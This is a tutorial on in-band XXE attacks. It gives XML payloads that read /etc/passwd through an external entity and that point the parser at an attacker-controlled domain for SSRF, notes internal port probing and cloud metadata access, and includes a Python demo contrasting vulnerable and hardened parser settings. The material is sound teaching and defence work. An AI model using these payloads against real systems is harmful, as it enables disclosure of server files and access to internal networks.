In-Band XML External Entity (XXE)

What is In-Band XXE?
An XXE attack is in-band when the parser's output, including whatever the injected entity resolved to, comes back to the attacker in the application's own response (echoed in a result page, or quoted in an error message). In-band XXE is the easiest variant to exploit: an attacker can read files on the server, make the server issue requests on their behalf (SSRF), and, in the rare configurations where the parser exposes a command wrapper such as PHP's expect://, run commands on the server.

Examples:
Let's understand XXE with a basic example. Assume a college application offers a filter option, and the following XML document is sent as input to an insecurely configured parser:

<?xml version="1.0" encoding="UTF-8"?> 
<filter>
    <semester>3</semester>
    <branch>CE</branch>
</filter>

Example 1: Retrieval of the server's internal files.

If the server parses this document insecurely (external entities enabled), an attacker can submit the following payload to exploit the XXE (note that the ENTITY keyword must be upper case; XML keywords are case-sensitive):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [<!ENTITY brn SYSTEM "file:///etc/passwd">]>
<filter>
    <semester>3</semester>
    <branch>&brn;</branch>
</filter>

The attacker has declared an external entity named "brn". When the server parses the document, the parser replaces &brn; with the contents of /etc/passwd, and because the application echoes the branch value back in its response, the file is returned to the attacker:

Invalid branch: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Example 2: Performing SSRF attacks

If the server parses this document insecurely, an attacker can point the entity at a URL instead of a file and use the parser to perform SSRF:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE filter [<!ENTITY brn SYSTEM "http://www.attackercontrolleddomain.com/">]>
<filter>
    <semester>3</semester>
    <branch>&brn;</branch>
</filter>

When the parser resolves brn, it sends an HTTP request to the attacker-controlled server. Receiving that request confirms that the parser fetches external entities, whether or not the result is reflected. From there the attacker can aim the entity at addresses only the server can reach: probing ports on internal hosts (open and closed ports produce different errors or response times) or reading services exposed only to the server, such as cloud metadata endpoints. Two caveats apply to the in-band case. First, the fetched body is spliced into the document as XML text, so a response containing a bare & or < makes the parse fail; the resulting error message may still leak part of the content. Second, a parser that resolves the entity but never reflects it is the blind case, which needs out-of-band techniques rather than the reflected output shown here.
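Both examples rely on the same mechanism: the parser fetches SYSTEM entities and splices the result into the document. The script below is an added example, not code from the original page; it reproduces the branch filter with Python's standard-library xml.sax, which fetches external general entities only when the feature_external_ges feature is switched on (the feature has been off by default since Python 3.6.7/3.7.1). The parse_branch, xxe_payload and demo names, the BranchHandler class, and the temporary "passwd" and "notes.txt" files that stand in for /etc/passwd and for a file that is not well-formed XML text are all assumptions made for this example. Aiming the same entity at an http:// URL goes through urllib in exactly the same way and produces the Example 2 callback; the demo uses file:// so that it runs offline.

```python
"""Added example, not the page's code: XXE against Python's stdlib xml.sax.

Assumptions made here: parse_branch() stands in for the college app's filter
handler and returns whatever text ends up inside <branch>; the temporary files
created in demo() stand in for /etc/passwd and for a file the parser cannot
splice in cleanly.
"""
import io
import tempfile
from pathlib import Path
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class BranchHandler(ContentHandler):
    """Collects the character data that ends up inside <branch>...</branch>."""

    def __init__(self):
        super().__init__()
        self.in_branch = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "branch":
            self.in_branch = True

    def endElement(self, name):
        if name == "branch":
            self.in_branch = False

    def characters(self, content):
        # Text pulled in from a resolved external entity arrives here too.
        if self.in_branch:
            self.parts.append(content)

    @property
    def branch(self):
        return "".join(self.parts)


def parse_branch(payload: bytes, resolve_external: bool) -> str:
    """Parse the filter document and return what <branch> resolved to.

    resolve_external=True is the insecure configuration: xml.sax fetches
    SYSTEM entities (file://, http://) through urllib and splices the fetched
    text into the document. False is the stdlib default (since Python
    3.6.7/3.7.1): the reference is dropped and nothing is fetched.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = BranchHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return handler.branch


def xxe_payload(system_id: str) -> bytes:
    """The attacker's document from the page, with the entity aimed at system_id."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE filter [<!ENTITY brn SYSTEM "{system_id}">]>\n'
        "<filter>\n"
        "    <semester>3</semester>\n"
        "    <branch>&brn;</branch>\n"
        "</filter>\n"
    ).encode()


def demo() -> dict:
    """Run the payload against the vulnerable and the safe configuration."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed stand-in for /etc/passwd: plain text, no '<' or '&'.
        passwd = Path(tmp) / "passwd"
        passwd.write_text("root:x:0:0:root:/root:/bin/bash\n")
        # Constructed file with a bare '&': not well-formed XML text, so the
        # in-band splice fails and the parser raises instead of echoing it.
        notes = Path(tmp) / "notes.txt"
        notes.write_text("user & password\n")

        results = {
            "vulnerable": parse_branch(xxe_payload(passwd.as_uri()), True),
            "hardened": parse_branch(xxe_payload(passwd.as_uri()), False),
        }
        try:
            results["unparseable"] = parse_branch(xxe_payload(notes.as_uri()), True)
        except xml.sax.SAXException as exc:
            results["unparseable"] = f"parse error: {exc}"
        return results


if __name__ == "__main__":
    for mode, outcome in demo().items():
        print(f"{mode:12s} -> {outcome!r}")
```

The "vulnerable" run returns the contents of the stand-in passwd file as the branch value, which is exactly what the application would echo back in Example 1; the "hardened" run returns an empty branch because the reference is never resolved; the "unparseable" run shows the in-band caveat, a fetched file containing a bare & fails the parse instead of being reflected. For other Python parsers the equivalent hardening is lxml's XMLParser(resolve_entities=False), or wrapping the parser with defusedxml.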
